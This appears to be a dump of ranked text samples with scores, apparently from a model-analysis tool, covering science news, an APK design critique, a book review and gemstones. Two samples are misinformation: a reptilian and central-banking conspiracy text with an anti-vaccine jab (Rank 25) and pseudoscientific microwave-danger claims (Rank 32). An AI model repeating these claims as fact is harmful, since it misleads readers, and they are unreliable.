stubs or start-class articles. There are also more than 200 non-English-language editions of Wikipedia that need volunteers. In other words, there is still much work to be done – and you can help! + +How you can help + +Video of Wikipedians from around the world who contribute to a variety of Wikipedia's language editions + +Wikipedia is written by the people who use it. Anyone, regardless of background, can contribute to building the encyclopedia. You +================================================================================ +Rank = 20; Score = 1351680.0 +<|begin_of_text|>By, 3 + +LAKE WALES, Fla. -- Researchers at the Department of Energy's (DoE's) Brookhaven National Laboratory have claimed a world record, saying they have patterned devices with feature sizes as small as 1nm. The research team hopes to use the same technique to create and impart to silicon new properties never before observed. + +So far, the Brookhaven researchers have only proven the concept with poly-methyl methacrylate or PMMA -- a polymer commonly used as a coating in lithography as an alternative to glass (under the Plexiglas trade name) and a resist called hydrogen silsesquioxane. A schematic showing a focused electron beam (green) shining through a polymeric film (grey: carbon atoms; red: oxygen atoms; white: hydrogen atoms) with yellow indicating scope of electron beam. + +(Source: Brookhaven National Laboratory) + +Brookhaven scientists made clever use of an electron microscope to pattern the material at even smaller sizes than is normally possible with electron-beam lithography (EBL). The electron-sensitive materials were exposed to a focused beam of electrons, as usual, but with its features reduced to a size capable of manipulating individual atoms. The result is a new tool capable of dramatically altering a material's properties, from electrical conductivity to light transmission and interactions between the two. + +The feat was accomplished by the Center for Functional Nanomaterials (CFN), a DoE Office of Science User Facility at Brookhaven (Long Island, N.Y.). The 1nm features patterned using the scanning transmission electron microscope (STEM) were spaced 11 nanometers apart, which could allow nearly one trillion features to be patterned within a single square centimeter. They also achieved 2nm resolution with the aberration-corrected STEM with a 5nm half-pitch in hydrogen silsesquioxane resist. + +(Left to right) Lihua Zhang, Vitor Manfrinato, and Aaron Stein team at Brookhaven Lab's Center for Functional Nanomaterials. Team members not pictured are Chang-Yong Nam, Kevin Yager, Eric Stach, and Charles Black. + +(Source: Brookhaven National Laboratory) + +The resolution limits of aberration-corrected electron-beam lithography -- usually 10 nanometers at best -- were improved by installing a slow-moving pattern generator that followed the instructions from a specialized computer program. The automated STEM provided a focused electron beam at the atomic scale enabling individual atoms to be assembled into patterns, including gold palladium features as small as +================================================================================ +Rank = 21; Score = 1327104.0 +<|begin_of_text|>Clocks and watches – they are our everyday companions, our faithful time keepers. We regulate our lives according to them. But are they totally trustworthy? Can a precise and perfect timepiece ever exist? + +The answer is the atomic clock, which Swiss scientists are developing at CSEM (Centre Suisse d’électronique et microtechnique) in the Swiss city of Neuchatel. + +The atomic clock measures time accurately, because it relies on the radiation emitted by atoms. It means that the frequency emitted by atoms of hydrogen are measured, and that gives the reference for the time. The original version of the atomic clock, built in the 90s, was the size of a household washing machine. + +But CSEM scientists working in Neuchatel’s old astronomical observatory are moving steadily towards the progressive miniaturisation of the atomic clock. Their goal is to reduce it to the size of a sugar cube. + +Miniaturisation will greatly reduce manufacturing costs and power consumption allowing this technology to be used more widely, possibly it could even enter the consumer market in battery-operated devices, like GPS or smart phones. + +According to physicist Steve Lecomte, what is known as the heart of the clock is key. It has to be reduced in size to nearly a millimetre: “Minitiarisation is useful in order to put atomic clocks in more instruments and mobile devices. Our ultimate goal here at CSEM is work towards having an atomic timepiece in a wrist-watch.” + +Scientists not only hope to install atomic clocks in consumer electronic devices, but they want to use them for scientific purposes, such as verifying Einstein’s theory of relativity. + +“If we were to put an atomic clock in a smartphone with a GPS for example, then we’d have a frequency base in the GPS which would allow a faster sychronisation with geo-positioning satellites and therefore a more efficient device,” explained CSEM physicist Jacques Haesler. + +“Right now, if you have in a wrist-watch, you have to wind it up from time to time. Maybe every day or every few weeks. With an atomic clock inside, in theory you’ll only need to set it once every 3,000 years, providing of course your battery lasts that long,” he added. + +Today the best atomic clocks are able to keep time to the point where they will gain or lose a second, every one billion years, and they are powered by an extremely tiny engine. This miniscule part, only a millimetre across, holds the key to a future in which +================================================================================ +Rank = 22; Score = 1302528.0 +<|begin_of_text|>Each antibody binds only one specific antigen. + +Monoclonal antibody therapy is a form of immunotherapy that uses monoclonal antibodies (mAb) to bind monospecifically to certain cells or proteins. The objective is that this treatment will stimulate the patient's immune system to attack those cells. Alternatively, in radioimmunotherapy a radioactive dose localizes a target cell line, delivering lethal chemical doses.[1] More recently antibodies have been used to bind to molecules involved in T-cell regulation to remove inhibitory pathways that block T-cell responses. This is known as immune checkpoint therapy.[2] + +It is possible to create a mAb that is specific to almost any extracellular/cell surface target. Research and development is underway to create antibodies for diseases (such as rheumatoid arthritis, multiple sclerosis, Alzheimer's disease, Ebola[3] and different types of cancers). + +Antibody structure and function [ edit ] + +Immunoglobulin G (IgG) antibodies are large heterodimeric molecules, approximately 150 kDa and are composed of two kinds of polypeptide chain, called the heavy (~50kDa) and the light chain (~25kDa). The two types of light chains are kappa (κ) and lambda (λ). By cleavage with enzyme papain, the Fab (fragment-antigen binding) part can be separated from the Fc (fragment constant) part of the molecule. The Fab fragments contain the variable domains, which consist of three antibody hypervariable amino acid domains responsible for the antibody specificity embedded into constant regions. The four known IgG subclasses are involved in antibody-dependent cellular cytotoxicity.[4] Antibodies are a key component of the adaptive immune response, playing a central role in both in the recognition of foreign antigens and the stimulation of an immune response to them. The advent of monoclonal antibody technology has made it possible to raise antibodies against specific antigens presented on the surfaces of tumors.[5] Monoclonal antibodies can be acquired in the immune system via passive immunity or active immunity.The advantage of active monoclonal antibody therapy is the fact that the immune system will produce antibodies long-term, with only a short-term drug administration to induce this response. However, the immune response to certain antigens may be inadequate, especially in the elderly. Additionally, adverse reactions from these antibodies may occur because of long-lasting response to antigens.[6] Passive monoclonal antibody therapy can ensure consistent antibody concentration, and can control for adverse reactions by stopping administration. +================================================================================ +Rank = 23; Score = 1294336.0 +<|begin_of_text|>Nobody wants a laptop computer that stops working when a cloud passes by. Storing sunlight as fuel that can be later used to drive fuel cells requires new materials. Scientists demonstrated such a material. They combined two oxides on the atomic scale. The interface between the oxide materials, one containing strontium and titanium and one containing lanthanum and chromium, absorbs visible light, producing electrons and holes that might be useful for catalyzing reactions, such as producing hydrogen fuel. However, if there is nothing to pull those electrons and holes apart, they will quickly annihilate one another without doing anything useful. By carefully synthesizing this material as a series of alternating layers, the international team created a built-in electric field that could help separate the excited electrons and holes and improve the material's performance as a catalyst. + +This material opens up new scientific frontiers to solve a persistent energy challenge: storing solar energy for later use. Fuel cells capable of running on hydrogen fuel created by solar energy could allow people to heat their homes and run their computers on solar energy even in the dark of night. + +By depositing thin layers of SrTiO 3 and LaCrO 3 on a crystalline substrate, the investigators at the Pacific Northwest National Laboratory, Argonne National Laboratory, SuperSTEM, and the University of Oxford controlled how the ions at the interfaces bond to each other. This allowed them to engineer an electric field in the material that can be used to separate electrons and holes. Using X-ray spectroscopy techniques, they confirmed that the electric field was present and that the ions in the material shift positions as a result. Ultra-high resolution measurements using an electron microscope helped confirm this ionic shift. + +All of these experimental results were backed up by computational modeling of the materials, which predicted behavior in excellent agreement with what was observed. + +The electric field in these materials is present because the researchers were able to precisely control the growth process so that each interface has either a positive or negative charge. Alternating positively and negatively charged interfaces in the material produce nanoscale electric fields that can interact with the electrons and holes that are excited by solar energy. Electrons may then be driven to the surface, where they could interact with water molecules to break their bonds and produce hydrogen fuel. + +Researchers are continuing to explore the properties of these superlattices using cutting-edge X-ray measurements at synchrotrons around the world and using other advanced microscopy techniques to look at the chemical makeup of the interfaces.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 24; Score = 1286144.0 +<|begin_of_text|>There may be enough oxygen in the waters of Jupiter's moon Europa to support millions of tons worth of fish, according to a new study. And while nobody is suggesting there might actually be fish on Europa, this finding suggests the Jovian satellite could be capable of supporting the kinds of life familiar to us here on Earth, if only in microbial form. + +Europa, which is roughly the size of Earth's moon, is enveloped by a global ocean about 100 miles deep (160 km), with an icy crust that may be only a few miles thick. From what we know of Earth, where there is water, there is a chance at life, so for many years scientists have speculated that this Jovian moon could support extraterrestrials. + +As we learned more about Jupiter's effect on its moons, the possibility for life on Europa grew even more likely. Studies showed the moon could have enough oxygen to support the kind of life we are most familiar with on Earth. + +IN PICTURES: Jupiter + +The ice on the surface, like all water, is made from hydrogen and oxygen, and the constant stream of radiation pouring in from Jupiter reacts with this ice to form free oxygen and other oxidants such as hydrogen peroxide. The reactivity of oxygen is key to generating the energy that helped multi-cellular life flourish on our planet. + +Still, researchers had thought there was no effective method for delivering any of this oxygen-rich matter into Europa's ocean. Scientists had assumed the primary way for surface materials to migrate downward was from the impacts it would suffer from cosmic debris, which regularly bombards everything in our solar system. [Photos of Jupiter's moons.] + +However, past calculations suggested that even after a few billion years, such "impact gardening" would never lead to an oxygenated layer more than some 33 feet (10 meters) deep into the ice shell, nowhere far enough down to reach the underlying ocean. + +However, the new study suggests this oxygen-rich layer could be far thicker than before thought, potentially encompassing the entire crust. The key is looking at other ways to stir Europa's crust, explained researcher Richard Greenberg, a planetary scientist at the University of Arizona's Lunar and Planetary Laboratory at Tucson. + +The gravitational pull Europa experiences from Jupiter leads to tidal forces roughly 1,000 times stronger than what Earth feels from our moon, flexing and heating Europa and making it very active geologically. This could explain why its surface appears no older than 50 million years old — its surface underwent complete turnover in that time +================================================================================ +Rank = 25; Score = 1261568.0 +<|begin_of_text|>The New World Disorder is a Reptilian Disorder designed to destroy what ENKI has created from the Appa Beast with the Divine Anunnaki Mothers and with the Clay of the Earth. + +The Reptiles call Humanity Beasts because you comprise of Carbon Atoms,6 Neutrons, 6 Electrons, 6 Protons, 666, the Atomic structure of the Beast, the Adamu,a Carbon Based Life Form. + +A Worker & Builder Group of the Creator. + +You are Marvalous Builders and Highly Creative. + +Humans are Carbon Based Lifeforms, while the Reptilians are Copper based. + +Sure Reptilians are stronger and live longer than Humans but they too are far from perfect, they have shortfalls, they lack Empathy, they lack compassion, they lack Passion, they lack Free will because they are slaves to their own hierarchy, they lack Love and are very heartless Beings and only know Domination and percieve Compassion as a Weakness and a Joke. + +They will never evolve to Higher Levels of Existence because they do not have what the Falcon Masters have, the Gift of the Akhu (The Divine Feather). + +Humanity on the other hand has been designed to be Unlimited in their Potential, Yes Unlimited, created by the Ultimate GENESIS Sciences of the Heavens. + +The Reptilian Vaccines will never alter the DNA of Adamu, the Reptilian Mind Control will never overcome DESTINY. + +Hear these words for these words are Eternal, Eternal. + +The CENTRAL BANKING SYSTEM is a REPTILIAN SYSTEM, The Dredds ( Jamaica ) call it the Babylon System, Correct it is an Ancient System, a System not only being used here on Earth but on other Planets in other Star Systems. + +The CENTRAL BANKING SYSTEM is EXTRATERRESTRIAL and it is a PRIVATE ORGANIZATION that Holds Governments & Kings to Account. + +The CENTRAL BANKS fund Wars, they fund Heroes & Enemies alike, yes they Fund$$$ both sides. + +No Nation can go to WAR without Funding$$$ from these CENTRAL BANKS. + +Governments that over extend their Budgets because of reckless Spending $$$, can Increase TAXES from the Beast, but when they are Bankrupt they will go to the CENTRAL BANKS for LOANS and to SECURE these LOANS with the EXTRATERRESTRIALS they hold the Nations Sovereignty and the Lives of all Humans / Adamu as collateral which is Treason. + +Humans must hold their respective Governments to Account for +================================================================================ +Rank = 26; Score = 1245184.0 +<|begin_of_text|>Get the Better newsletter. + +July 29, 2017, 6:35 PM GMT / Updated July 16, 2018, 1:02 AM GMT By Christina Heiser + +There’s nothing quite as synonymous with summer as the beach — and we’ve got good news for those who flock to the surf and sand as soon as work lets out on Friday afternoon. + +Research finds that spending time by the ocean is pretty good for your wellbeing. In fact, according to an analysis of English census data published in the journal Health Place, those who live by the coast report better physical and mental health than those who don’t. + +And in a study published in the Journal of Coastal Zone Management, participants who live in homes with ocean views report feeling calmer than those without them. + +So, it makes sense then that Hawaii has earned the ranking of happiest state in the U.S. by the annual Gallup poll six times since 2008, doesn’t it? + +How the Beach Boosts Your Mood + +When it comes to why, exactly, the beach gets you feeling all Zen, there are a few factors at play, says Richard Shuster, PsyD, clinical psychologist and host of The Daily Helping podcast. + +“The color blue has been found by an overwhelming amount of people to be associated with feelings of calm and peace,” says Shuster. “Staring at the ocean actually changes our brain waves’ frequency and puts us into a mild meditative state.” A study published in the American Association for the Advancement of Science’s journal even found that blue is associated with a boost of creativity. + +The smell of the ocean breeze contributes to your soothed state, which may have something to do with the negative ions in the air that you’re breathing in. + +Plus, that consistent ebbing and flowing you hear as you lie on your towel under an umbrella? “It kind of de-stimulates our brains,” says Shuster. The noises — coupled with the visuals — activate your parasympathetic nervous system, which is “responsible for slowing us down and allowing us to relax and feel more engaged,” says Sally Nazari, PsyD, owner of Chrysalis Psychological Services and host of the podcast Beyond the Couch. + +The smell of the ocean breeze also contributes to your soothed state, which may have something to do with the negative ions in the air that you’re breathing in. These oxygen atoms have an extra electron and occur in places like waterfalls and the ocean, says Shuster. A study published in the +================================================================================ +Rank = 27; Score = 1196032.0 +<|begin_of_text|>Researchers in Japan have found a way to make the 'wonder material' graphene superconductive - which means electricity can flow through it with zero resistance. The new property adds to graphene's already impressive list of attributes, like the fact that it's stronger than steel, harder than diamond, and incredibly flexible. + +But superconductivity is a big deal, even for graphene, because when electricity can flow without resistance, it can lead to significantly more efficient electronic devices, not to mention power lines. Right now, energy companies are losing about 7 percent of their energy as heat as a result of resistance in the grid. + +Before you get too excited, this demonstration of superconductivity in graphene occurred at a super cold -269 degrees Celsius, so we're not going to be making power lines out of graphene any time soon. + +But what is exciting, is that this research suggests that graphene could be used to build nano-sized, high-speed electronic devices. Just imagine all the electricity we could save with computers that rely on tiny graphene circuity, capable of zooming electrons around without wasting energy as heat. + +For those who aren't already familiar with graphene, the material is a one-atom-thick layer of graphite (the stuff that makes up your pencils), which is made up of carbon atoms arranged in a hexagonal honeycomb patterns. + +The electrons inside graphene are already pretty special, because they're able to take on a special state called Dirac-cone, where they behave as if they have no mass. That makes them very speedy, but even though graphene is a very efficient conductor, it's not a superconductor, which is a state that requires zero resistance. + +Now a team from Tohoku University and the University of Tokyo have managed to achieve superconductivity by creating two graphene sheets and inserting calcium atoms between them - sort of like a calcium sandwich, with graphene acting as the bread. + +Takashi Takahashi + +These graphene sheets were grown on a silicon carbide crystal (the SiC substrate in the image above), and the team was able to show that when the temperature gets to around 4 Kelvin, or -269 degrees Celsius, the electrical conductivity of the material rapidly drops - a clear indication of superconductivity. + +Superconductivity generally relies on electrons not repelling each other, as they usually do, and pairing up instead, so they can flow through materials effortlessly. As you can imagine, when that happens in a material with electrons that are already acting like they have no mass, scientists get pretty excited. + +"This is significant +================================================================================ +Rank = 28; Score = 1179648.0 +<|begin_of_text|>ON A list of cutting-edge materials for high-tech applications, you might not expect to see wood near the top. But an experiment by Teng Li and Liangbing Hu of the University of Maryland may soon put it there. For Dr Li and Dr Hu, writing in Nano Letters, have just described how wood might be used to make one class of batteries cheaper by permitting the lithium now employed in them to be replaced with sodium. + +As any high-school chemist knows, lithium and sodium are chemically similar. Sodium ions (sodium atoms with an electron missing, which makes them positively charged) are, however, five times the size of lithium ions. That matters because a battery works by shuttling ions between its anode and its cathode. The bigger the ion, the more damage this shuttling causes—and the shorter, in consequence, is the battery’s life. Hitherto, that has ruled sodium out as a plausible ingredient of batteries. But engineers would still like to devise a commercially viable sodium battery, because sodium is much more abundant than lithium. + +Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks. + +Dr Li and Dr Hu wondered if the problem of electrode damage might be ameliorated by using a more pliant material for the frames on which the electrodes are suspended. These frames, which also transmit current to and from the electrodes, are normally made of metal, and are therefore rigid. But the two researchers reckoned that suitably treated wood could do the job of conduction equally well while providing more yielding support for an electrode that was continually expanding and contracting as ions moved in and out of it. + +To test this idea, they used slivers of wood from yellow pines. First, they coated these with carbon nanotubes, to improve their conductivity. Then they applied a film of tin to each sliver. (Tin is the preferred material for the anode in a lithium or sodium battery.) This done, they immersed the slivers in an electrolyte containing sodium ions and put the resulting battery through 400 cycles of discharging and recharging. As a control, they built similar batteries using slivers of copper. + +The wooden battery was not perfect. Its initial capacity was 339 milliamp hours per gram (mAH/g), but that fell to 145 mAH/g over the course of the 400 cycles. This, however, was not bad for a prototype, and far better than the copper-framed batteries managed. They had an initial capacity of +================================================================================ +Rank = 29; Score = 1155072.0 +<|begin_of_text|>APK Files + +All Android apps are deployed and contained in so called APK files. APK files are really just ZIP archives that contain a few mandatory folders and metadata files in addition to the application binary and application resource files such as images, XML layout files, arbitrary binary data, etc. + +Good And Folly + +APK files are a good medium for distributing Android apps as they cram the myriad pieces of an app into one convenient archive which is easy to copy and distribute. The APK folly is that installed apps are never extracted from the archive and placed in a simple folder. Instead they are kept in the archive. + +Why + +Ok, so you ask why is keeping installed apps in APK files an incredibly foolish design choice? Simply, because it requires all code that accesses a resource file to deal specially with the APK file format. + +This may not seem like much of an issue since the SDK provides a couple of mechanisms to use and access resources. Nearly all classes that use resource files accept resource IDs defined in the auto-generated R.java file and the SDK takes care of loading the resources for you. Even better, there is the Resources class for accessing resources directly by obtaining InputStream instances to them and even AssetFileDescriptors for them. + +These mechanism don’t really solve the problem. In the first instance, the SDK is simply hiding the underlying problem by accepting the resource IDs and accessing the APK file behind the scenes. Obviously, the SDK still has special code to extract resources from the APK file. Special code that exists only for specific file types (images, XML layouts, etc.) explicitly handled by the SDK in this way. + +The second instance is not really a solution, it is a manifestation of the problem. The resource files are buried in the APK file and we need the Resources class to access them. All the standard methods of opening a file, in Java or native C, are useless. You can’t use new FileInputStream() in Java or open() a file in C. We need special code that is aware of the APK format and uses the designated APIs to extract files from it. + +At least in theory. In practice the Resources class does not provide a real solution for accessing APK resource files from C. There is an extremely convoluted method of obtaining the APK’s file descriptor in Java from an undocumented member of an AssetFileDescriptor instance, obtaining the offset and length of the resource in the APK file and passing the triplet through JNI. You can read about it here. The alternative is to compile your native code with libzip support and to process the APK file yourself +================================================================================ +Rank = 30; Score = 1138688.0 +<|begin_of_text|>A low-cost, high-speed method for printing graphene inks using a conventional roll-to-roll printing process, like that used to print newspapers and crisp packets, could open up a wide range of practical applications, including inexpensive printed electronics, intelligent packaging and disposable sensors. + +Developed by researchers at the University of Cambridge in collaboration with Cambridge-based technology company Novalia, the method allows graphene and other electrically conducting materials to be added to conventional water-based inks and printed using typical commercial equipment, the first time that graphene has been used for printing on a large-scale commercial printing press at high speed. + +Graphene is a two-dimensional sheet of carbon atoms, just one atom thick. Its flexibility, optical transparency and electrical conductivity make it suitable for a wide range of applications, including printed electronics. Although numerous laboratory prototypes have been demonstrated around the world, widespread commercial use of graphene is yet to be realised. + +“We are pleased to be the first to bring graphene inks close to real-world manufacturing. There are lots of companies that have produced graphene inks, but none of them has done it on a scale close to this,” said Dr Tawfique Hasan of the Cambridge Graphene Centre (CGC), who developed the method. “Being able to produce conductive inks that could effortlessly be used for printing at a commercial scale at a very high speed will open up all kinds of different applications for graphene and other similar materials.” + +“This method will allow us to put electronic systems into entirely unexpected shapes,” said Chris Jones of Novalia. “It’s an incredibly flexible enabling technology.” + +Hasan’s method, developed at the University’s Nanoscience Centre, works by suspending tiny particles of graphene in a ‘carrier’ solvent mixture, which is added to conductive water-based ink formulations. The ratio of the ingredients can be adjusted to control the liquid’s properties, allowing the carrier solvent to be easily mixed into a conventional conductive water-based ink to significantly reduce the resistance. The same method works for materials other than graphene, including metallic, semiconducting and insulating nanoparticles. + +Currently, printed conductive patterns use a combination of poorly conducting carbon with other materials, most commonly silver, which is expensive. Silver-based inks cost £1000 or more per kilogram, whereas this new graphene ink formulation would be 25 times cheaper. Additionally, silver is not recyclable, while graphene and other carbon materials can easily be recycled. The new method uses cheap, non-toxic and environmentally friendly solvents that can be dried quickly at room temperature, +================================================================================ +Rank = 31; Score = 1138688.0 +<|begin_of_text|>Save Saved Removed 0 + +I thought it would be a few years before we saw hydrogen fuel cells used in camping… but here they are… + +One of the award winners at this year’s Outdoor Trade Show was the Hydrogen Fuel Cell USB charger from Brunton. + +This phone charger takes lightweight hydrogen fuel cells that releases hydrogen into a reactor to generate power, and only releases water vapour, not fumes. + +They estimate that a single hydrogen fuel cell, which just looks like a metal cylinder, is equivalent to 15AA batteries and should be enough for 6 mobile phone charges. + +The reactor comes with two hydrogen fuel cells, and more can be purchased (believed to be around £4 each). + +Now for most of us family campers, we usually camp with our car, and so a 12V adaptor that fits in the car usually does the trick. Solar powered chargers have also improved recently, and the Coleman CPX Lanterns also come with a USB charging solution. However, the use of hydrogen fuel cells and their promise of ‘clean’ energy has really been only in university research departments. Until now. + +We had a play with the Brunton hydrogen reactor at the show. It’s really lightweight and small – ideal to fit in a back pack. + +So whilst this is not something high on the list for family camping, it’s a useful bit of kit if you are going to be away from a power source for a while, and it is an interesting piece of high-tech gadgetry aimed at campers and hikers.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 1130496.0 +<|begin_of_text|>Microwave Facts + +Microwaves are radio waves with frequencies ranging from around 300 million cycles per second (300 MHz) to 3 GHz. RF. A standard measure of exposure for microwave energy is the Specific Absorption Rate (SAR) or rate of tissue energy absorption measured in watts per kilogram of tissue. + +Microwave radiation leakage can damage human cells and tissues. + +All appliances working on electricity produce a toxic electromagnetic field (EMF) of approximately 60 hertz. This is over and above potential microwave leakage from appliances or devices. + +Microwave ovens can leak + +Microwave leakage is serious enough that the FDA sets strict limits on it for the manufacturers. But once door seals age, leaking tends to exceed those limits, often at head level. That’s bad news, because the microwave energy inside a microwave oven is massive! + +Frequency inside your microwave 2.45 BILLION hertz. + +Frequency shown to start harming the human body: over 10 hertz + +That’s 2.45 billion vs. 10 hertz. It doesn’t take very big leak for the damage to begin. (One top culprit: aging door seals) + +The facts about microwaves & cataracts + +Eyes are especially vulnerable to microwaves. That’s because unlike other areas of the body, they lack the blood vessels to dissipate the heat and cellular stress. + +The first suspected clinical case of microwave-caused cataracts was reported by Hirsch and Parker as early as 1950's. (Sulman 1980). + +For decades, cataracts have been reported in workers exposed to this type of radiation. (On the back of the lens where radiation cataracts usually occur.) + +What do microwaves do to food? + +In a microwave oven, alternating current forces atoms reverse polarity at a startlingly high rate. This creates such violent friction that the water inside the food molecules begin to vibrate and heat up. + +The dangers of microwaved foods. + +Microwaves break chemical and molecular bonds, and can literally rip atoms apart, disrupting the basic biochemical structures of life. It’s no wonder foods cooked in such a way become so harmful to consume.Government and industry studies suggest they pose no threat, but a growing body of knowledge now contradicts those claims. + +Microwaved foods lose nutrition. + +The Swiss scientist Hans Hertel, was the first to study microwave dangers, specifically, how cooking degrades and depletes food of nutrients—an effect that shows up in study participants' blood samples. + + +================================================================================ +Rank = 33; Score = 1097728.0 +<|begin_of_text|>This is a ground-breaking philosophical exploration of consciousness and the self as they occur across the states of waking, falling asleep, dreaming, lucid dreaming, deep dreamless sleep, out-of-body experiences and dying. Evan Thompson's rich, beautifully written book interweaves lucid prose with relevant personal anecdotes, bringing the latest neuroscience together with ancient contemplative wisdom to offer valuable insight into the nature of consciousness and the self. The first-person methodologies of Indian and Asian contemplative traditions such as Yoga, Vedānta and Buddhism generate data that go beyond the reach of the standard scientific approach taken by Western neuroscience and psychology, for example on the possible presence of consciousness during deep dreamless sleep. At the same time, the Western scientific and philosophical approach serves to temper some of Indian metaphysical assertions, such as the claim that consciousness does not depend upon the brain. Thompson argues convincingly that the different approaches -- combined to form 'neurophenomenology' -- produce data that reinforce and complement each other, solidifying findings that, from just one perspective, would be more speculative (for example, that a minimal moment of reportable object-directed awareness is 10-20ms). One of main theses to emerge from the study is that the self is a fluid process, not a static thing, nor the illusion of a thing. Like clouds, the 'I-making' enacted self breaks up and re-forms with the different states of being, and like a sunlit sky, the luminous and pure background consciousness is able reveal the workings and contents of both, all the more so if cultivated as a meta-awareness through practices of meditation and mindfulness. + +An outstanding feature is the book's accessible presentation of up-to-date empirical data on both neuro-psychological research and its interface with studies on meditation. Thompson is unusually well-placed to write such a book. A meditation practitioner and lucid dreamer himself, he's also a renowned philosopher of mind who has for years been an active participant in dialogues among key players in the field, such as his well-known (now-deceased) mentor the cognitive neuroscientist Francisco Varela, the Dalai Lama and leading meditation neuroscientist Richard Davidson. His philosophical contributions to the field of cognitive science (including several previous books) enable him to synthesise the inter-disciplinary findings in a way that not only offers novel answers to existing questions but, like a tantalising Scrabble word, also opens up the field to provocative questions that invite new directions of critical engagement. + +In Chapter 1 +================================================================================ +Rank = 34; Score = 1048576.0 +<|begin_of_text|>Opal is composed of small beads of silica – alpha-cristobalite – low temperature, but tightly closed in a waterproof casing. Between these “beads” have cavities that contain a small amount of water. Reflection of light on the surface of the opal crystallization gives reflections that differ from each stone depending on the “form” created by all the elements described above. There are many types of opal. Opal can be dull and have no value, in which case such opals called “common opal” because only the large stones of bright colors are “semi-precious opals”. + +Type of opal found together with Opal, wearing a certain value, called the Australian “treats”. It has no value as a gemstone; It is used as a basis for simulating a gemstone (ie “synthetic opal”) doublets (based) or triplets (based on coated). Opal “treats” can be white, gray, black, honey, amber or water colors. flickr/David Abercrombie + +Opal is one of the most beautiful stones in the world, and, of course, one of the most expensive. Famous contemporary designers often use it in their work. Also, this stone is very rare: some of his views may cost 40 000 euros, and even higher. + +flickr/Mike Fitzpatrick + +flickr/Igor Schwartzmann + +flickr/Jeffrey Hunt + +flickr/Oona + +flickr/Stan Celestian + +flickr/Luis Alves + +flickr/Stan Celestian + +Source – 